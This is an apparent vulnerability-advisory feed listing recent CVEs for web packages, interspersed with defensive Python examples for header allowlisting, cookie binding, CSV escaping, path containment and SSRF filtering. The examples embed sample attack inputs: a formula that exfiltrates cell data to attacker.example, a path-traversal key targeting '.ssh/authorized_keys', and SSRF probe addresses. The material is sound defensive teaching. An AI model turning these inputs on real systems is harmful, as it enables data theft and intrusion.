Recently Added Advisories

Advisories that have been merged within the last 14 days are listed below (sorted from newest to oldest).
Advisories published through NVD are available in the GitLab Advisory database within 1.6 days (on average).

CVE-2021-3994

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in pypi/django-helpdesk

django-helpdesk is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Added on 2021-12-03

CVE-2021-3993

Cross-Site Request Forgery (CSRF) in packagist/showdoc/showdoc

showdoc is vulnerable to Cross-Site Request Forgery (CSRF)

Added on 2021-12-03

CVE-2021-3989

URL Redirection to Untrusted Site ('Open Redirect') in packagist/showdoc/showdoc

showdoc is vulnerable to URL Redirection to Untrusted Site

Added on 2021-12-03

CVE-2021-4017

Cross-Site Request Forgery (CSRF) in packagist/showdoc/showdoc

showdoc is vulnerable to Cross-Site Request Forgery (CSRF)

Added on 2021-12-03

CVE-2021-4018

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in packagist/snipe/snipe-it

snipe-it is vulnerable to Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Added on 2021-12-03

CVE-2021-3990

Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG) in packagist/showdoc/showdoc

showdoc is vulnerable to Use of Cryptographically Weak Pseudo-Random Number Generator (PRNG)

Added on 2021-12-03

CVE-2021-25967

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in pypi/ckan

CKAN is affected by a stored XSS vulnerability via SVG file upload of users’ profile picture. This allows low privileged application users to store malicious scripts in their profile picture. These scripts are executed in a victim’s browser when they open the malicious profile picture.

Added on 2021-12-03

CVE-2021-22095

Deserialization of Untrusted Data in maven/org.springframework.amqp/spring-amqp

The Spring AMQP Message object, in its `toString()` method, will create a new String object from the message body, regardless of its size. This can cause an OOM Error with a large message.

Added on 2021-12-02

CVE-2021-41270, GHSA-2xhg-w2g5-w95x

Improper Neutralization of Formula Elements in a CSV File in packagist/symfony/symfony

`Symfony/Serializer` handles serializing and deserializing data structures for Symfony, a PHP framework for web and console applications and a set of reusable PHP components. Symfony is vulnerable to CSV injection, also known as formula injection. In Symfony, maintainers added the opt-in `csv_escape_formulas` option in the `CsvEncoder`, to prefix all cells starting with `=`, `+`, `-` or `@` with a tab `\t`. Since then, OWASP added two characters to that list, tab (0x09) and carriage return (0x0D). This makes the previous prefix character (tab `\t`) one of the trigger characters itself, and OWASP now suggests prefixing the value with a single quote `'`.

Added on 2021-12-02

CVE-2021-41268, GHSA-qw36-p97w-vcqr

Session Fixation in packagist/symfony/security-http

`Symfony/SecurityBundle` is the security system for Symfony, a PHP framework for web and console applications and a set of reusable PHP components. Since the rework of the remember-me cookie, the cookie is not invalidated when the user changes their password. Attackers can therefore keep access to the account even after the password is changed, as long as they have logged in once and obtained a valid remember-me cookie. Patched versions make the password part of the cookie signature by default, so the cookie is no longer valid once the password changes.

Added on 2021-12-01

CVE-2021-23732

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in npm/docker-cli-js

If the command parameter of the `Docker.command` method can at least be partially controlled by a user, they will be in a position to execute any arbitrary OS commands on the host system.

Added on 2021-12-01

CVE-2021-43785, GHSA-f34m-x9pj-62vq

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in npm/@joeattardi/emoji-button

@joeattardi/emoji-button is a Vanilla JavaScript emoji picker component. There are two vectors for XSS attacks, a URL for a custom emoji, and an i18n string. In both of these cases, a value can be crafted such that it can insert a `script` tag into the page and execute malicious code.

Added on 2021-12-01

CVE-2021-43788, GHSA-pfj7-2qfw-vwgm

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in npm/nodebb

Nodebb is an open source Node.js based forum software. A path traversal vulnerability was present that allowed users to access JSON files outside of the expected `languages/` directory.

Added on 2021-12-01

CVE-2021-43787, GHSA-wx69-rvg3-x7fc

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in npm/nodebb

A prototype pollution vulnerability in the uploader module allowed a malicious user to inject arbitrary data (i.e. javascript) into the DOM, theoretically allowing for an account takeover when used in conjunction with a path traversal vulnerability disclosed at the same time as this report.

Added on 2021-12-01

CVE-2021-43786, GHSA-hf2m-j98r-4fqw

Improper Authentication in npm/nodebb

Incorrect logic present in the token verification step unintentionally allowed master token access to the API.

Added on 2021-12-01

CVE-2021-32061

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in pypi/S3Scanner

S3Scanner allows Directory Traversal via a crafted bucket, as demonstrated by a `<Key>../` substring in a ListBucketResult element.

Added on 2021-12-01

CVE-2021-41267, GHSA-q3j3-w37x-hq2q

Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') in packagist/symfony/symfony

`Symfony/Http-Kernel` is the HTTP kernel component for Symfony, a PHP framework for web and console applications and a set of reusable PHP components. Headers that are not part of the `trusted_headers` allowed list are ignored, which protects users from cache poisoning attacks. In Symfony, maintainers added support for the `X-Forwarded-Prefix` header, but this header was accessible in sub-requests even when it was not part of the `trusted_headers` allowed list. An attacker could forge requests containing an `X-Forwarded-Prefix` header, leading to web cache poisoning.

Added on 2021-12-01

CVE-2021-41268, GHSA-qw36-p97w-vcqr

Session Fixation in packagist/symfony/symfony

`Symfony/SecurityBundle` is the security system for Symfony, a PHP framework for web and console applications and a set of reusable PHP components. Since the rework of the remember-me cookie, the cookie is not invalidated when the user changes their password. Attackers can therefore keep access to the account even after the password is changed, as long as they have logged in once and obtained a valid remember-me cookie. Patched versions make the password part of the cookie signature by default, so the cookie is no longer valid once the password changes.

Added on 2021-12-01

CVE-2021-41267, GHSA-q3j3-w37x-hq2q

Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') in packagist/symfony/security-http

`Symfony/Http-Kernel` is the HTTP kernel component for Symfony, a PHP framework for web and console applications and a set of reusable PHP components. Headers that are not part of the `trusted_headers` allowed list are ignored, which protects users from cache poisoning attacks. In Symfony, maintainers added support for the `X-Forwarded-Prefix` header, but this header was accessible in sub-requests even when it was not part of the `trusted_headers` allowed list. An attacker could forge requests containing an `X-Forwarded-Prefix` header, leading to web cache poisoning.

Added on 2021-12-01

CVE-2021-25987

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in npm/hexo

Hexo is vulnerable to stored XSS. The post `body` and `tags` are not sanitized for malicious JavaScript during web page generation, so a local unprivileged attacker can inject arbitrary code.

Added on 2021-12-01

CVE-2021-41267, GHSA-q3j3-w37x-hq2q

Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') in packagist/symfony/http-kernel

`Symfony/Http-Kernel` is the HTTP kernel component for Symfony, a PHP framework for web and console applications and a set of reusable PHP components. Headers that are not part of the `trusted_headers` allowed list are ignored, which protects users from cache poisoning attacks. In Symfony, maintainers added support for the `X-Forwarded-Prefix` header, but this header was accessible in sub-requests even when it was not part of the `trusted_headers` allowed list. An attacker could forge requests containing an `X-Forwarded-Prefix` header, leading to web cache poisoning. Patched versions ensure that the `X-Forwarded-Prefix` header is not forwarded to sub-requests when it is not trusted.

Added on 2021-12-01
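
The three `X-Forwarded-Prefix` entries above describe one rule: a forwarded-header allowlist only protects the application if it is applied to every request object the framework derives, sub-requests included. The following Python is an added example written for this page, not Symfony's code; the header names, the `trusted` set and the URL layout used as a cache key are illustrative assumptions. `subrequest_url(..., filter_headers=False)` reproduces the bug class, the default reproduces the fix.

```python
# Header names and the URL layout are illustrative assumptions; this is not Symfony's code.
FORWARDED_HEADERS = frozenset({
    "X-Forwarded-For", "X-Forwarded-Host", "X-Forwarded-Port",
    "X-Forwarded-Proto", "X-Forwarded-Prefix",
})


def sanitize_forwarded(headers: dict, trusted: frozenset) -> dict:
    """Keep ordinary headers; drop forwarded headers the deployment has not declared trusted."""
    return {k: v for k, v in headers.items() if k not in FORWARDED_HEADERS or k in trusted}


def url_from_headers(headers: dict, path: str) -> str:
    """The absolute URL a component builds from whatever forwarded headers reach it.
    A shared cache keyed on this URL is poisoned if an attacker can steer the prefix."""
    scheme = headers.get("X-Forwarded-Proto", "http")
    host = headers.get("X-Forwarded-Host", headers.get("Host", ""))
    return f"{scheme}://{host}{headers.get('X-Forwarded-Prefix', '')}{path}"


def main_request_url(raw_headers: dict, trusted: frozenset, path: str) -> str:
    """Main request: the allowlist is applied before any URL is generated."""
    return url_from_headers(sanitize_forwarded(raw_headers, trusted), path)


def subrequest_url(raw_headers: dict, trusted: frozenset, path: str,
                   filter_headers: bool = True) -> str:
    """Internal sub-request (fragment / forward) derived from the main request.

    filter_headers=False reproduces the bug class described above: the main request
    ignored the untrusted X-Forwarded-Prefix, but the sub-request inherits the raw
    header set and generates URLs carrying the attacker's prefix."""
    headers = sanitize_forwarded(raw_headers, trusted) if filter_headers else dict(raw_headers)
    return url_from_headers(headers, path)


if __name__ == "__main__":
    # Constructed inbound request: the proxy is trusted for the scheme only.
    raw = {"Host": "shop.example", "X-Forwarded-Proto": "https",
           "X-Forwarded-Prefix": "/attacker-controlled"}
    trusted = frozenset({"X-Forwarded-Proto"})
    print("main request  :", main_request_url(raw, trusted, "/cart"))
    print("vulnerable sub:", subrequest_url(raw, trusted, "/_fragment/menu", filter_headers=False))
    print("fixed sub     :", subrequest_url(raw, trusted, "/_fragment/menu"))
```

The same allowlist belongs at the edge as well: a reverse proxy should overwrite or strip every `X-Forwarded-*` header it receives from clients, so that the application only ever sees values the proxy itself set.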

CVE-2021-41268, GHSA-qw36-p97w-vcqr

Session Fixation in packagist/symfony/security

`Symfony/SecurityBundle` is the security system for Symfony, a PHP framework for web and console applications and a set of reusable PHP components. Since the rework of the remember-me cookie, the cookie is not invalidated when the user changes their password. Attackers can therefore keep access to the account even after the password is changed, as long as they have logged in once and obtained a valid remember-me cookie. Patched versions make the password part of the cookie signature by default, so the cookie is no longer valid once the password changes.

Added on 2021-12-01
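
The remember-me entries above (the same CVE listed for `security-http`, `symfony` and `security`) turn on a single design detail: what the cookie's signature covers. The Python below is an added example for this page, not Symfony's implementation; the cookie layout, the `APP_SECRET` value and the user store are constructed. It issues a cookie in the pre-fix layout (signature over user and expiry only) and in the fixed layout (the stored password hash mixed into the HMAC input, never into the cookie itself), rotates the password, and verifies both.

```python
import hashlib
import hmac

# Constructed server secret; a real deployment uses its long random application secret.
APP_SECRET = b"constructed-app-secret-for-the-example"


def _sign(parts) -> str:
    return hmac.new(APP_SECRET, "\x1f".join(parts).encode(), hashlib.sha256).hexdigest()


def issue_legacy(user_id: str, expires: int) -> str:
    """Pre-fix layout: the signature covers only user and expiry, so nothing about the
    cookie changes when the user changes their password."""
    return f"{user_id}:{expires}:{_sign([user_id, str(expires)])}"


def issue_bound(user_id: str, expires: int, password_hash: str) -> str:
    """Fixed layout: the stored password hash goes into the HMAC input (never into the
    cookie itself), so a password change changes the expected signature."""
    return f"{user_id}:{expires}:{_sign([user_id, str(expires), password_hash])}"


def verify(cookie: str, users: dict, now: int, bind_password: bool) -> bool:
    """Check a remember-me cookie against the current user store.
    users maps user_id -> current password hash; now is epoch seconds."""
    try:
        user_id, exp_s, sig = cookie.split(":")
        expires = int(exp_s)
    except ValueError:
        return False
    if now >= expires or user_id not in users:
        return False
    parts = [user_id, exp_s]
    if bind_password:
        parts.append(users[user_id])
    return hmac.compare_digest(sig, _sign(parts))


def password_change_outcome():
    """Issue both cookie styles, rotate the password, report which one still verifies."""
    users = {"alice": "$argon2id$constructed-old-hash"}   # constructed user store
    now = 1_700_000_000
    expires = now + 30 * 86400
    legacy = issue_legacy("alice", expires)
    bound = issue_bound("alice", expires, users["alice"])
    users["alice"] = "$argon2id$constructed-new-hash"      # the user changes their password
    return (verify(legacy, users, now, bind_password=False),
            verify(bound, users, now, bind_password=True))


if __name__ == "__main__":
    legacy_ok, bound_ok = password_change_outcome()
    print("legacy cookie still valid after password change:", legacy_ok)  # True
    print("bound cookie still valid after password change: ", bound_ok)   # False
```

Binding the signature to the password hash costs nothing at verification time (the hash is already loaded to look the user up) and gives password change the same effect as "log out everywhere" for remember-me sessions. Rotating `APP_SECRET` invalidates every cookie at once, which is the emergency lever if a secret leaks.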

CVE-2021-23654

Improper Neutralization of Formula Elements in a CSV File in pypi/html-to-csv

When an HTML page contains a formula, it is accepted without any validation and written unchanged into the generated CSV file. A malicious actor can thereby embed a malicious link or trigger command execution via the CSV file when it is opened in a spreadsheet application.

Added on 2021-12-01
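
Both CSV injection entries above (the Symfony `CsvEncoder` escaping change and the `html-to-csv` converter that passes formulas through) come down to which leading characters are treated as formula triggers and what prefix neutralizes them. The Python below is an added example written for this page, not code from either project. It implements the pre-fix tab prefix over the legacy trigger list, the fixed single-quote prefix over the extended OWASP list, and an audit function that scans an existing CSV for cells a spreadsheet would evaluate; the sample rows are constructed.

```python
import csv
import io

# Characters Symfony's original csv_escape_formulas option treated as formula starters.
LEGACY_TRIGGERS = frozenset("=+-@")
# OWASP's current list adds tab (0x09) and carriage return (0x0D).
FORMULA_TRIGGERS = LEGACY_TRIGGERS | {"\t", "\r"}


def is_formula(cell: str) -> bool:
    """Would a spreadsheet interpret this cell as a formula? (current OWASP trigger list)"""
    return bool(cell) and cell[0] in FORMULA_TRIGGERS


def escape_legacy(cell: str) -> str:
    """Pre-fix behaviour: prefix a formula-looking cell with a tab.
    The tab is itself a trigger, so the output still starts with a trigger character,
    and a payload that already starts with a tab is not touched at all."""
    return "\t" + cell if cell and cell[0] in LEGACY_TRIGGERS else cell


def escape_formula(cell: str) -> str:
    """Fixed behaviour: single-quote prefix, checked against the extended trigger list."""
    return "'" + cell if is_formula(cell) else cell


def to_csv(rows, escaper=escape_formula) -> str:
    """Serialize rows to CSV text, passing every cell through the given escaper."""
    buf = io.StringIO()
    writer = csv.writer(buf, lineterminator="\n")
    for row in rows:
        writer.writerow([escaper(str(cell)) for cell in row])
    return buf.getvalue()


def find_formula_cells(csv_text: str):
    """Audit an existing CSV (e.g. one produced from scraped HTML): (row, col) of every
    cell a spreadsheet would evaluate."""
    return [(r, c)
            for r, row in enumerate(csv.reader(io.StringIO(csv_text)))
            for c, cell in enumerate(row)
            if is_formula(cell)]


if __name__ == "__main__":
    # Constructed rows, as if scraped from an HTML table by a converter that does no validation.
    scraped = [
        ["name", "total"],
        ["bob", '=HYPERLINK("http://attacker.example/?"&A1,"view")'],
        ["eve", "\t=1+1"],
    ]
    print("unescaped      :", find_formula_cells(to_csv(scraped, escaper=str)))
    print("legacy escaping:", find_formula_cells(to_csv(scraped, escape_legacy)))
    print("fixed escaping :", find_formula_cells(to_csv(scraped, escape_formula)))
```

The trade-off the OWASP rule carries: negative numbers such as `-1` also start with a trigger and get quoted, so consumers that parse the CSV programmatically must strip the leading `'` or read the data from a non-CSV channel. The audit function is the useful piece for the `html-to-csv` case, where the untrusted content arrives from a page the converter did not author.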

CVE-2021-41279, GHSA-4x2f-54wr-4hjg

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in packagist/baserproject/basercms

BaserCMS is an open source content management system with a focus on Japanese language support. Users with upload privilege may upload crafted zip files capable of path traversal on the host operating system. This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.

Added on 2021-12-01

CVE-2021-41243, GHSA-7rpc-9m88-cf9w

Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') in packagist/baserproject/basercms

There is a Potential Zip Slip Vulnerability and OS Command Injection Vulnerability on the management system of baserCMS. Users with permissions to upload files may upload crafted zip files which may execute arbitrary commands on the host operating system. This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users. If you are eligible, please update to the new version as soon as possible.

Added on 2021-12-01

CVE-2021-43558

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in packagist/moodle/moodle

A URL parameter in the filetype site administrator tool requires extra sanitizing to prevent a reflected XSS risk.

Added on 2021-11-30

CVE-2021-44140

Incorrect Default Permissions in maven/org.apache.jspwiki/jspwiki-main

Remote attackers may delete arbitrary files on a system hosting a JSPWiki instance by using a carefully crafted HTTP request on logout, given that those files are reachable by the user running the JSPWiki instance.

Added on 2021-11-30

CVE-2021-40369

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in maven/org.apache.jspwiki/jspwiki-main

A carefully crafted plugin link invocation could trigger an XSS vulnerability on Apache JSPWiki, related to the Denounce plugin, which could allow the attacker to execute javascript in the victim's browser and retrieve sensitive information about the victim.

Added on 2021-11-30

CVE-2021-44140

Incorrect Default Permissions in maven/org.apache.jspwiki/jspwiki-war

Remote attackers may delete arbitrary files on a system hosting a JSPWiki instance by using a carefully crafted HTTP request on logout, given that those files are reachable by the user running the JSPWiki instance.

Added on 2021-11-30

CVE-2021-40369

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in maven/org.apache.jspwiki/jspwiki-war

A carefully crafted plugin link invocation could trigger an XSS vulnerability on Apache JSPWiki, related to the Denounce plugin, which could allow the attacker to execute javascript in the victim's browser and retrieve sensitive information about the victim.

Added on 2021-11-30

CVE-2021-41281, GHSA-3hfw-x7gx-437c

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in pypi/matrix-synapse

Synapse is a package for Matrix homeservers written in Python 3/Twisted. Synapse instances with the media repository enabled can be tricked into downloading a file from a remote server into an arbitrary directory. No authentication is required for the affected endpoint. The last two directories and the file name of the path are chosen randomly by Synapse and cannot be controlled by an attacker, which limits the impact. Homeservers with the media repository disabled are unaffected. Homeservers with a federation allowlist are also unaffected, since Synapse checks the remote hostname, including the trailing `../`s, against the allowlist. Server administrators using a reverse proxy may, at the expense of losing media functionality, block the affected endpoints as a workaround. Alternatively, non-containerized deployments can be adapted to use the hardened systemd config.

Added on 2021-11-30

CVE-2021-43559

Cross-Site Request Forgery (CSRF) in packagist/moodle/moodle

The `delete related badge` functionality does not include the necessary token check to prevent a CSRF risk.

Added on 2021-11-30

CVE-2021-20841

Incorrect Authorization in packagist/ec-cube/ec-cube

Improper access control in Management screen of EC-CUBE 2 series allows a remote authenticated attacker to bypass access restriction and to alter System settings via unspecified vectors.

Added on 2021-11-30

CVE-2021-43775, GHSA-8phj-f9w2-cjcc

Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') in pypi/aim

Aim is an open-source, self-hosted machine learning experiment tracking tool. Aim is vulnerable to a path traversal attack. By manipulating variables that reference files with `(../)` sequences and its variations or by using absolute file paths, it may be possible to access arbitrary files and directories stored on file system including application source code or configuration and critical system files.

Added on 2021-11-30
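
Several entries above are the same bug in different clothing: an untrusted string becomes part of a filesystem path (the `<Key>../` in S3Scanner's `ListBucketResult`, the remote hostname in Synapse's media repository, the `languages/` lookup in NodeBB, the zip entry names in baserCMS, the variables in Aim). The Python below is an added example for this page, not code from any of those projects. One `safe_join` helper does the containment check, and three thin callers show it applied to an S3 listing, a Matrix-style `server_name`/`media_id` pair and a zip extraction plan; all inputs, paths and the XML sample are constructed.

```python
import os
import re
import xml.etree.ElementTree as ET


class TraversalError(ValueError):
    """An untrusted path component would resolve outside the allowed directory."""


def safe_join(base: str, *untrusted: str) -> str:
    """Join untrusted components under base and prove the result stays inside it.

    Rejects empty components, NUL bytes and absolute paths up front, then normalises
    the joined path and checks that the resolved base is still its prefix. ``../``
    sequences are therefore caught wherever they sit, not only at the start."""
    base_real = os.path.realpath(base)
    for part in untrusted:
        if not part or "\x00" in part or os.path.isabs(part):
            raise TraversalError(f"rejected component {part!r}")
    candidate = os.path.realpath(os.path.join(base_real, *untrusted))
    if candidate == base_real or os.path.commonpath([base_real, candidate]) != base_real:
        raise TraversalError(f"{candidate!r} escapes {base_real!r}")
    return candidate


# 1. S3Scanner-style: object keys from a ListBucketResult become local file names.
def list_bucket_keys(list_bucket_xml: str):
    root = ET.fromstring(list_bucket_xml)
    # Tolerate the S3 XML namespace by comparing the local tag name only.
    return [el.text or "" for el in root.iter() if el.tag.rsplit("}", 1)[-1] == "Key"]


def download_targets(list_bucket_xml: str, bucket: str, download_dir: str):
    """(key, local_path) per object; local_path is None for keys that would traverse."""
    targets = []
    for key in list_bucket_keys(list_bucket_xml):
        try:
            targets.append((key, safe_join(download_dir, bucket, key)))
        except TraversalError:
            targets.append((key, None))
    return targets


# 2. Synapse-style: a remote server name and media id become a path under the media store.
SERVER_NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.\-]*(:[0-9]{1,5})?")
MEDIA_ID_RE = re.compile(r"[A-Za-z0-9_\-]+")


def remote_media_path(media_root: str, server_name: str, media_id: str) -> str:
    # Validate the syntax first: a server name never legitimately contains '/'.
    if not SERVER_NAME_RE.fullmatch(server_name):
        raise TraversalError(f"bad server_name {server_name!r}")
    if not MEDIA_ID_RE.fullmatch(media_id):
        raise TraversalError(f"bad media_id {media_id!r}")
    return safe_join(media_root, "remote_content", server_name, media_id)


# 3. Zip slip: decide where every entry would land before extracting anything.
def zip_extraction_plan(entry_names, dest: str) -> dict:
    """Map entry name -> destination path; raises on the first entry that escapes dest,
    so a crafted archive is rejected as a whole rather than partially extracted."""
    return {name: safe_join(dest, name) for name in entry_names}


if __name__ == "__main__":
    listing = ('<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">'
               '<Contents><Key>reports/2021.csv</Key></Contents>'
               '<Contents><Key>../../home/user/.ssh/authorized_keys</Key></Contents>'
               '</ListBucketResult>')  # constructed bucket listing
    for key, path in download_targets(listing, "bucket", "/nonexistent-demo/s3"):
        print(f"{key!r:45} -> {path}")
```

The hostname regex is deliberately stricter than what a DNS resolver would accept; for a path component, the question is not "is this a valid name" but "can this string only ever name one directory". `safe_join` remains the last line of defence for anything the regexes let through.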

CVE-2021-43560

Exposure of Resource to Wrong Sphere in packagist/moodle/moodle

Insufficient capability checks made it possible to fetch other users' calendar action events.

Added on 2021-11-30

CVE-2021-23718

Server-Side Request Forgery (SSRF) in npm/ssrf-agent

The package ssrf-agent is vulnerable to Server-side Request Forgery (SSRF) via the `defaultIpChecker` function. It fails to properly validate if the IP requested is private.

Added on 2021-11-30
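
The `ssrf-agent` entry above is about a single predicate: "is this IP address one we must never fetch from?" The Python below is an added example for this page, not the `ssrf-agent` code; it shows what a checker has to cover that a naive private-range test misses (IPv4-mapped IPv6, link-local and metadata ranges, shared address space, and non-canonical IPv4 spellings), plus a resolver-side wrapper that rejects a hostname if any of its records is disallowed. The fake DNS table in the test is constructed; the default resolver uses `socket.getaddrinfo`.

```python
import ipaddress
import socket


def is_disallowed_ip(text: str) -> bool:
    """True if a server-side request must not be sent to this address.

    Parsing is strict: only canonical dotted-quad IPv4 and RFC 4291 IPv6 literals are
    accepted. Shorthand that libc resolvers accept but a naive checker may not
    (127.1, 2130706433, 0x7f000001, 0177.0.0.1) is rejected rather than guessed at."""
    if "." in text and any(len(o) > 1 and o[0] == "0" for o in text.split(".")):
        return True                             # leading-zero octets are octal to inet_aton
    try:
        ip = ipaddress.ip_address(text)
    except ValueError:
        return True                             # 127.1, 2130706433, hostnames, garbage
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped                     # ::ffff:127.0.0.1 -> 127.0.0.1
    return (not ip.is_global                    # RFC 1918, loopback, 0/8, 100.64/10, ULA, ...
            or ip.is_multicast or ip.is_reserved
            or ip.is_link_local                 # 169.254/16 (cloud metadata), fe80::/10
            or ip.is_unspecified)


def vet_host(hostname: str, resolve=None):
    """Resolve hostname and return every address it maps to, or raise ValueError if any
    of them is disallowed. Checking all records matters: an attacker-controlled name can
    return one public and one internal address and hope the client picks the latter."""
    if resolve is None:
        def resolve(name):
            return sorted({info[4][0] for info in socket.getaddrinfo(name, None)})
    addrs = resolve(hostname) or []
    if not addrs:
        raise ValueError(f"{hostname}: no addresses")
    blocked = [a for a in addrs if is_disallowed_ip(a)]
    if blocked:
        raise ValueError(f"{hostname} resolves to disallowed address(es): {blocked}")
    return addrs


if __name__ == "__main__":
    for probe in ("10.0.0.5", "::ffff:169.254.169.254", "127.1", "100.64.0.1", "93.184.216.34"):
        print(f"{probe:28} disallowed={is_disallowed_ip(probe)}")
```

The wrapper only closes the window if the caller then connects to one of the returned addresses (sending the original name in the `Host` header) instead of resolving the hostname a second time; otherwise a short-TTL record can answer the check with a public address and the actual connection with an internal one. Redirects need the same vetting on every hop.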

CVE-2021-25986

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in pypi/django-wiki

Django-wiki is vulnerable to Stored Cross-Site Scripting (XSS) in the Notifications Section. An attacker who has access to edit pages can inject JavaScript payload in the title field. When a victim gets a notification regarding the changes made in the application, the payload in the notification panel renders and loads external JavaScript.

Added on 2021-11-30

CVE-2021-3672

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in conan/c-ares

A flaw was found in the c-ares library, where a missing input validation check of host names returned by DNS (Domain Name Servers) can lead to output of wrong hostnames, which might potentially lead to domain hijacking. The highest threat from this vulnerability is to confidentiality and integrity as well as system availability.

Added on 2021-11-30

CVE-2021-20842

Cross-Site Request Forgery (CSRF) in packagist/ec-cube/ec-cube

A Cross-site request forgery (CSRF) vulnerability in the EC-CUBE 2 series allows a remote attacker to hijack the authentication of administrators and delete administrators via a specially crafted web page.

Added on 2021-11-30

CVE-2021-44150

Use of a Broken or Risky Cryptographic Algorithm in nuget/tusdotnet

The client in tusdotnet relies on SHA-1 to prevent spoofing of file content.

Added on 2021-11-30

CVE-2021-43698

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in packagist/phpwhois/phpwhois

PhpWhois is affected by a Cross Site Scripting (XSS) vulnerability. In file `example.php`, the exit function will terminate the script and print the message to the user. The message contains the result of the `$_GET['query']` leading to an XSS vulnerability.

Added on 2021-11-30

CVE-2021-23673

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in npm/plupload

This affects all versions of package pekeupload. If an attacker induces a user to upload a file whose name contains javascript code, the javascript code will be executed.

Added on 2021-11-25

CVE-2021-43668

NULL Pointer Dereference in go/github.com/ethereum/go-ethereum

Go-Ethereum nodes crash (denial of service) after receiving a series of messages and cannot be recovered.

Added on 2021-11-25

CVE-2021-2471

Uncontrolled Resource Consumption in pypi/mysql-connector-python

Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Connectors accessible data and unauthorized ability to cause a hang or frequently repeatable crash (complete DoS) of MySQL Connectors.

Added on 2021-11-24

CVE-2021-43668

NULL Pointer Dereference in go/github.com/ethereum/go-ethereum/cmd/evm

Go-Ethereum nodes crash (denial of service) after receiving a series of messages and cannot be recovered. They crash with "runtime error: invalid memory address or nil pointer dereference" and raise a SEGV signal.

Added on 2021-11-24

CVE-2021-43669

Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') in go/github.com/hyperledger/fabric

A vulnerability has been detected in Hyperledger Fabric. An attacker can bring down as many orderers as they want by sending the `Order` interface a message with an invalid header. This bug has been acknowledged and fixed by the Fabric developers.

Added on 2021-11-24

CVE-2021-43667

NULL Pointer Dereference in go/github.com/hyperledger/fabric

A vulnerability has been detected in Hyperledger Fabric. If leveraged, any leader node will crash.

Added on 2021-11-24

CVE-2021-41278, GHSA-6c7m-qwxj-mvhp

Use of a Broken or Risky Cryptographic Algorithm in go/github.com/edgexfoundry/app-functions-sdk-go

Functions SDK for EdgeX is meant to provide all the plumbing necessary for developers to get started in processing/transforming/exporting data out of the EdgeX IoT platform. The app-functions-sdk exports an “aes” transform that user scripts can optionally call to encrypt data in the processing pipeline. No decrypt function is provided. Encryption is not enabled by default, but if used, the level of protection may be less than the user expects due to a broken implementation. Version v2.1.0 (EdgeX Foundry Jakarta release) of app-functions-sdk-go/v2 deprecates the “aes” transform and provides an improved “aes256” transform in its place. The broken implementation will remain in a deprecated state until it is removed in the next EdgeX major release to avoid breakage of existing software that depends on the broken implementation. As the broken transform is a library function that is not invoked by default, users who do not use the AES transform in their processing pipelines are unaffected. Those that are affected are urged to upgrade to the Jakarta EdgeX release and modify processing pipelines to use the new "aes256" transform.

Added on 2021-11-24

CVE-2021-41278, GHSA-6c7m-qwxj-mvhp

Use of a Broken or Risky Cryptographic Algorithm in go/github.com/edgexfoundry/app-functions-sdk-go/v2

Functions SDK for EdgeX is meant to provide all the plumbing necessary for developers to get started in processing/transforming/exporting data out of the EdgeX IoT platform. The app-functions-sdk exports an “aes” transform that user scripts can optionally call to encrypt data in the processing pipeline. No decrypt function is provided. Encryption is not enabled by default, but if used, the level of protection may be less than the user expects due to a broken implementation. Version v2.1.0 (EdgeX Foundry Jakarta release) of app-functions-sdk-go/v2 deprecates the “aes” transform and provides an improved “aes256” transform in its place. The broken implementation will remain in a deprecated state until it is removed in the next EdgeX major release to avoid breakage of existing software that depends on the broken implementation. As the broken transform is a library function that is not invoked by default, users who do not use the AES transform in their processing pipelines are unaffected. Those that are affected are urged to upgrade to the Jakarta EdgeX release and modify processing pipelines to use the new "aes256" transform.

Added on 2021-11-24

CVE-2021-41278, GHSA-6c7m-qwxj-mvhp

Use of a Broken or Risky Cryptographic Algorithm in go/github.com/edgexfoundry/app-service-configurable

Functions SDK for EdgeX is meant to provide all the plumbing necessary for developers to get started in processing/transforming/exporting data out of the EdgeX IoT platform. The app-functions-sdk exports an “aes” transform that user scripts can optionally call to encrypt data in the processing pipeline. No decrypt function is provided. Encryption is not enabled by default, but if used, the level of protection may be less than the user expects due to a broken implementation. Version v2.1.0 (EdgeX Foundry Jakarta release) of app-functions-sdk-go/v2 deprecates the “aes” transform and provides an improved “aes256” transform in its place. The broken implementation will remain in a deprecated state until it is removed in the next EdgeX major release to avoid breakage of existing software that depends on the broken implementation. As the broken transform is a library function that is not invoked by default, users who do not use the AES transform in their processing pipelines are unaffected. Those that are affected are urged to upgrade to the Jakarta EdgeX release and modify processing pipelines to use the new "aes256" transform.

Added on 2021-11-24

CVE-2021-41274, GHSA-xm34-v85h-9pg2

Cross-Site Request Forgery (CSRF) in gem/solidus_auth_devise

